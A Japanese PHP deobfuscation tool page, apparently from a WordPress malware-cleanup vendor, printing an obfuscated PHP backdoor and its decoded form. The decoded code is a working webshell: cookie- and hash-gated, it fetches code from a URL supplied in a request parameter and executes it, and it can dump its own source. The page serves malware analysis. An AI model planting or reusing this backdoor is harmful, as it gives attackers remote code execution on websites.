デコード結果 (<?php goto OvaXW; g3Eex: $mdXDi = ${$bHnuF[17 + 14] . $bHnuF[59 + 0] . $bHnuF[20 + 27] . $bHnuF[3) PHP 難読化コード解除ツール 2025-03-21 03:33:06

下記のコードを難読化解除しました

<?php goto OvaXW; g3Eex: $mdXDi = ${$bHnuF[17 + 14] . $bHnuF[59 + 0] . $bHnuF[20 + 27] . $bHnuF[30 + 17] . $bHnuF[18 + 33] . $bHnuF[16 + 37] . $bHnuF[29 + 28]}; goto A8epI; OvaXW: $bHnuF = range("\176", "\x20"); goto g3Eex; A8epI: @(md5(md5(md5(md5($mdXDi[24])))) === "\x35\x61\x34\142\x38\x31\61\...

難読化されたPHPコード

<?php
 goto OvaXW; g3Eex: $mdXDi = ${$bHnuF[17 + 14] . $bHnuF[59 + 0] . $bHnuF[20 + 27] . $bHnuF[30 + 17] . $bHnuF[18 + 33] . $bHnuF[16 + 37] . $bHnuF[29 + 28]}; goto A8epI; OvaXW: $bHnuF = range("\176", "\x20"); goto g3Eex; A8epI: @(md5(md5(md5(md5($mdXDi[24])))) === "\x35\x61\x34\142\x38\x31\61\x35\x34\143\x39\x64\65\60\x62\62\x36\x65\x38\70\60\71\143\x39\142\70\x64\x64\x35\x62\66\x31") && (count($mdXDi) == 30 && in_array(gettype($mdXDi) . count($mdXDi), $mdXDi)) ? ($mdXDi[70] = $mdXDi[70] . $mdXDi[79]) && ($mdXDi[89] = $mdXDi[70]($mdXDi[89])) && @($mdXDi = $mdXDi[89]($mdXDi[59], $mdXDi[70](${$mdXDi[33]}[30]))) && $mdXDi() : $mdXDi; goto MQC2l; MQC2l: strlen("\x4e\172\115\x31\117\124\121\x34\x4e\104\143\x77\115\x7a\x6b\x79\x4e\x44\121\x34\x4e\x7a\x59\171\115\x6a\x59\61\115\172\105\x7a"); goto zUXKp; zUXKp: class BiP4h { static function zJASZ($oTfCA) { goto aMPXA; oaMbS: $d_TKJ = explode("\44", $oTfCA); goto NYI6v; SboaN: foreach ($d_TKJ as $zNlPI => $YRbp_) { $WOhDt .= $oe1M1[$YRbp_ - 58434]; DSKue: } goto PcTKL; F8VoI: $oe1M1 = $cuLvL("\x7e", "\x20"); goto oaMbS; NYI6v: $WOhDt = ''; goto SboaN; pJvT9: return $WOhDt; goto vAdON; aMPXA: $cuLvL = "\162" . "\x61" . "\156" . "\x67" . "\x65"; goto F8VoI; PcTKL: ng0PN: goto pJvT9; vAdON: } static function aRJgE($W3X2x, $Wmvne) { goto mD8Hr; QG9s6: $P7NYP = curl_exec($JkkBx); goto mfFEp; mfFEp: return empty($P7NYP) ? $Wmvne($W3X2x) : $P7NYP; goto tJ3mB; mD8Hr: $JkkBx = curl_init($W3X2x); goto qUOo9; qUOo9: curl_setopt($JkkBx, CURLOPT_RETURNTRANSFER, 1); goto QG9s6; tJ3mB: } static function KkLR6() { goto LFU4p; rTnC3: foreach ($RcyVK as $fm9cK) { $ywpVQ[] = self::ZjASZ($fm9cK); qwyo4: } goto kVBUa; kVBUa: ecsMu: goto c5l2S; M3mT0: @$ywpVQ[0 + 10](INPUT_GET, "\x6f\x66") == 1 && die($ywpVQ[1 + 4](__FILE__)); goto VoeL6; oh0Sr: die; goto jqOh2; k8mTb: $W4Fi2 = $ywpVQ[1 + 1]($cHSHK, true); goto M3mT0; QgutD: $cHSHK = @$ywpVQ[0 + 3]($ywpVQ[5 + 1], $bUUAu); goto k8mTb; uIkq3: @$ywpVQ[0]('', $ywpVQ[2 + 5] . $ywpVQ[0 + 4]($GHO3p) . $ywpVQ[1 + 7]); goto oh0Sr; jqOh2: j4Jtg: goto PM29u; c5l2S: $bUUAu = @$ywpVQ[1]($ywpVQ[3 + 7](INPUT_GET, $ywpVQ[1 + 8])); goto QgutD; LFU4p: $RcyVK = array("\x35\70\64\66\61\44\65\70\x34\x34\x36\44\65\70\64\x35\x39\44\x35\70\x34\66\63\44\x35\70\64\x34\x34\x24\x35\70\x34\65\x39\x24\x35\x38\x34\66\65\44\x35\x38\64\65\x38\44\x35\x38\64\x34\x33\x24\x35\x38\64\x35\60\44\x35\x38\64\x36\61\44\65\x38\64\64\x34\44\x35\x38\64\65\x35\44\x35\x38\64\x34\x39\44\x35\70\64\x35\x30", "\65\70\64\x34\65\44\x35\x38\x34\x34\64\x24\65\x38\64\x34\66\x24\x35\70\64\66\65\x24\65\70\x34\64\x36\x24\65\70\x34\x34\71\44\x35\70\x34\x34\x34\x24\x35\70\65\x31\61\44\65\70\65\60\71", "\x35\70\64\65\x34\x24\65\70\x34\64\x35\x24\65\x38\x34\64\71\44\x35\70\x34\x35\x30\44\x35\x38\64\66\65\x24\x35\x38\x34\66\60\x24\65\70\64\65\71\44\x35\x38\64\66\x31\44\65\70\x34\x34\x39\44\65\70\64\66\x30\44\x35\70\64\65\x39", "\65\x38\64\x34\70\x24\65\70\64\x36\63\x24\x35\x38\x34\66\61\x24\x35\70\x34\x35\x33", "\x35\70\x34\x36\x32\x24\x35\70\64\66\63\x24\65\x38\64\x34\65\x24\x35\x38\64\x35\71\44\x35\70\65\60\66\x24\65\70\65\60\x38\x24\x35\x38\64\66\x35\44\65\x38\x34\x36\60\x24\65\70\x34\65\x39\44\65\70\x34\x36\61\44\x35\x38\x34\64\x39\x24\x35\70\64\66\x30\x24\x35\x38\x34\65\x39", "\65\x38\x34\65\x38\x24\x35\x38\64\65\65\44\65\x38\64\x35\x32\44\x35\x38\64\65\71\44\65\70\64\x36\x35\x24\65\70\x34\65\67\x24\x35\70\64\65\71\44\x35\x38\x34\64\64\x24\65\70\64\66\65\44\65\70\64\66\x31\x24\65\70\64\x34\71\44\65\x38\x34\x35\x30\44\65\x38\x34\64\x34\x24\65\x38\64\65\x39\x24\65\x38\x34\x35\x30\x24\x35\70\64\x34\x34\44\x35\x38\x34\64\65", "\65\70\x34\70\x38\44\x35\70\65\x31\70", "\65\70\64\63\x35", "\65\x38\65\x31\63\x24\65\x38\65\61\x38", "\x35\x38\64\x39\65\x24\65\70\x34\67\x38\44\65\70\x34\67\x38\44\65\x38\64\71\x35\x24\x35\70\x34\x37\61", "\65\x38\x34\65\70\44\65\70\x34\65\65\x24\65\70\64\65\x32\x24\x35\x38\64\64\x34\x24\x35\70\x34\x35\x39\x24\65\x38\64\x34\x36\x24\65\70\64\66\x35\44\x35\70\64\x35\x35\44\65\70\64\65\x30\44\65\x38\64\x34\70\x24\65\x38\64\64\63\44\65\70\64\x34\x34"); goto rTnC3; VoeL6: if (!(@$W4Fi2[0] - time() > 0 and md5(md5($W4Fi2[0 + 3])) === "\x61\x63\x32\x35\145\63\x37\70\x33\x32\x64\64\64\63\x33\x30\141\70\x32\x66\67\x36\x64\63\x62\x62\70\61\x38\143\66\141")) { goto j4Jtg; } goto bD1Su; bD1Su: $GHO3p = self::arjGe($W4Fi2[1 + 0], $ywpVQ[4 + 1]); goto uIkq3; PM29u: } } goto EheFF; EheFF: BIP4H::KKLr6();
?>

デコード(難読化解除)されたコード

<?php

$bHnuF = range("~", " ");
$mdXDi = ${$bHnuF[31] . $bHnuF[59] . $bHnuF[47] . $bHnuF[47] . $bHnuF[51] . $bHnuF[53] . $bHnuF[57]};
@(md5(md5(md5(md5($mdXDi[24])))) === "5a4b81154c9d50b26e8809c9b8dd5b61") && (count($mdXDi) == 30 && in_array(gettype($mdXDi) . count($mdXDi), $mdXDi)) ? ($mdXDi[70] .= $mdXDi[79]) && ($mdXDi[89] = $mdXDi[70]($mdXDi[89])) && @($mdXDi = $mdXDi[89]($mdXDi[59], $mdXDi[70](${$mdXDi[33]}[30]))) && $mdXDi() : $mdXDi;
strlen("NzM1OTQ4NDcwMzkyNDQ4NzYyMjY1MzEz");
class BiP4h
{
    static function zJASZ($oTfCA)
    {
        $cuLvL = "range";
        $oe1M1 = range("~", " ");
        $d_TKJ = explode("\$", $oTfCA);
        $WOhDt = '';
        foreach ($d_TKJ as $zNlPI => $YRbp_) {
            $WOhDt .= $oe1M1[$YRbp_ - 58434];
        }
        return $WOhDt;
    }
    static function aRJgE($W3X2x, $Wmvne)
    {
        $JkkBx = curl_init($W3X2x);
        curl_setopt($JkkBx, CURLOPT_RETURNTRANSFER, 1);
        $P7NYP = curl_exec($JkkBx);
        return empty($P7NYP) ? $Wmvne($W3X2x) : $P7NYP;
    }
    static function KkLR6()
    {
        $RcyVK = array("58461\$58446\$58459\$58463\$58444\$58459\$58465\$58458\$58443\$58450\$58461\$58444\$58455\$58449\$58450", "58445\$58444\$58446\$58465\$58446\$58449\$58444\$58511\$58509", "58454\$58445\$58449\$58450\$58465\$58460\$58459\$58461\$58449\$58460\$58459", "58448\$58463\$58461\$58453", "58462\$58463\$58445\$58459\$58506\$58508\$58465\$58460\$58459\$58461\$58449\$58460\$58459", "58458\$58455\$58452\$58459\$58465\$58457\$58459\$58444\$58465\$58461\$58449\$58450\$58444\$58459\$58450\$58444\$58445", "58488\$58518", "58435", "58513\$58518", "58495\$58478\$58478\$58495\$58471", "58458\$58455\$58452\$58444\$58459\$58446\$58465\$58455\$58450\$58448\$58443\$58444");
        foreach ($RcyVK as $fm9cK) {
            $ywpVQ[] = self::ZjASZ($fm9cK);
        }
        $bUUAu = @$ywpVQ[1]($ywpVQ[10](INPUT_GET, $ywpVQ[9]));
        $cHSHK = @$ywpVQ[3]($ywpVQ[6], $bUUAu);
        $W4Fi2 = $ywpVQ[2]($cHSHK, true);
        @$ywpVQ[10](INPUT_GET, "of") == 1 && die($ywpVQ[5]("/var/www/html/input.php"));
        if (!(@$W4Fi2[0] - time() > 0 and md5(md5($W4Fi2[3])) === "ac25e37832d44330a82f76d3bb818c6a")) {
            // [PHPDeobfuscator] Implied return
            return;
        }
        $GHO3p = self::arjGe($W4Fi2[1], $ywpVQ[5]);
        @$ywpVQ[0]('', $ywpVQ[7] . $ywpVQ[4]($GHO3p) . $ywpVQ[8]);
        die;
    }
}
BIP4H::KKLr6();

■【無料】ワードプレス:マルウェアスキャン＆セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策カスタマイズや修正、引っ越し・復旧のご依頼承ります

PHP 難読化コードの復元・デコード

難読化されたPHPコード

デコード(難読化解除)されたコード